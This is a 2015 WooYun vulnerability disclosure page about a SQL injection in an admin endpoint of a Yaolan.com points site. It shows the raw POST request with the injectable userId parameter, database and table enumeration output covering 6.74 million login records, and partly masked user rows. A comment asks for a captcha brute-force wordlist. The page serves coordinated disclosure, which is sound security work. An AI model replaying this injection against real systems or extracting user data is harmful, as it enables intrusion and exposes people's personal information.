当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118883

漏洞标题:摇篮网某站点MySQL注射(涉及大量用户数据)

相关厂商:摇篮网

漏洞作者: lijiejie

提交时间:2015-06-07 21:26

修复时间:2015-07-23 17:22

公开时间:2015-07-23 17:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-07: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

摇篮网某站点MySQL注射(674万用户数据可拖库),库中包含用户密码,邮箱,手机号,QQ等资料

详细说明:

注射点在后台http://jifen.yaolan.com/admin.php?r=site/login:

POST /admin.php?r=site/GetUserCoin HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jifen.yaolan.com
Cookie: PHPSESSID=eqffbvsjk3ardoggo834p3g3v5
Host: jifen.yaolan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
userId=*

漏洞证明:

current user:    'userweb@%'
current database:    'user_yaolan_com'
Database: user_yaolan_com
[31 tables]
+-------------------------+
| BoroughList             |
| ChildInfo               |
| ChildInterestDetailList |
| ChildInterestInfo       |
| ChildInterestList       |
| CityList                |
| CoinInfo                |
| CountryList             |
| EducationList           |
| GeekList                |
| GradeList               |
| IncomeList              |
| LoginInfo               |
| MarkInfo                |
| NoDefaultChildInfo      |
| ProfessionList          |
| ProvinceList            |
| TradeList               |
| UserBaseInfo            |
| UserExtInfo             |
| UserGeekDetail          |
| UserInterestDetailList  |
| UserInterestInfo        |
| UserInterestList        |
| UserSignature           |
| UserSource              |
| UserVerifyDetail        |
| VerifyList              |
| iur_child_birth_based   |
| sysdiagrams             |
| word_filter_reg         |
+-------------------------+
Database: user_yaolan_com
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| LoginInfo | 6741020 |
+-----------+---------+


LoginInfo表中包括用户密码, UserBaseInfo和UserExtInfo两个表则包含用户的个人资料,邮箱手机号,QQ号码,地址等:
尝试取100万到1000010这10条记录,如下:

mask 区域 
*****Bind,ModifiedDate,MSN,NickNameLastModifiedTime,PostalAd*****
*****ot;,"NULL","NULL","NULL","163002","0&qu*****
*****0","NULL","NULL","NULL","NULL","*****
*****","NULL","NULL","NULL","317000",&quot*****
*****0","NULL","NULL","NULL","NULL","*****
*****ot;,"NULL","NULL","NULL","100091","0&q*****
*****0","NULL","NULL","NULL","NULL","0*****
*****00","NULL","NULL","NULL","510650",&quot*****
*****00","NULL","NULL","NULL","NULL","*****
*****00","NULL","NULL","NULL","NULL",&quot*****
*****;,"NULL","NULL","NULL","466200","0&quot*****
**********
*****d,RegDate,RegIp,ResetP*****
*****6c16b2","2003-10-10 14:00:49",&qu*****
*****f81dc7","2003-10-16 10:34:23",&qu*****
*****9efbae","2005-03-23 16:50:43",&qu*****
*****421f50","2003-11-11 15:32:21",&qu*****
*****3f09b9","2003-10-31 18:34:07",&qu*****
*****2f806b","2004-02-02 16:48:05",&qu*****
*****54db06","2003-10-27 08:31:31",&qu*****
*****06c118","2004-06-07 11:01:28",&qu*****
*****4a1a6e","2004-04-27 14:12:17",&qu*****
*****cod*****


修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-08 17:21

厂商回复:

漏洞确认,正在修复。感谢乌云白帽子提醒。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-07 21:34 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    卧槽 为什么我的没审核 我的在前面啊 这有重复没 @疯狗 @浩天 http://www.wooyun.org/bugs/wooyun-2015-0118715/trace/77bfdaa5d372b23bb1994d107aa4a37b

  2. 2015-06-07 21:57 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    @天地不仁 以万物为刍狗 我还以为你们是一起的@lijiejie

  3. 2015-06-08 10:21 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @天地不仁 以万物为刍狗 求个验证码爆破字典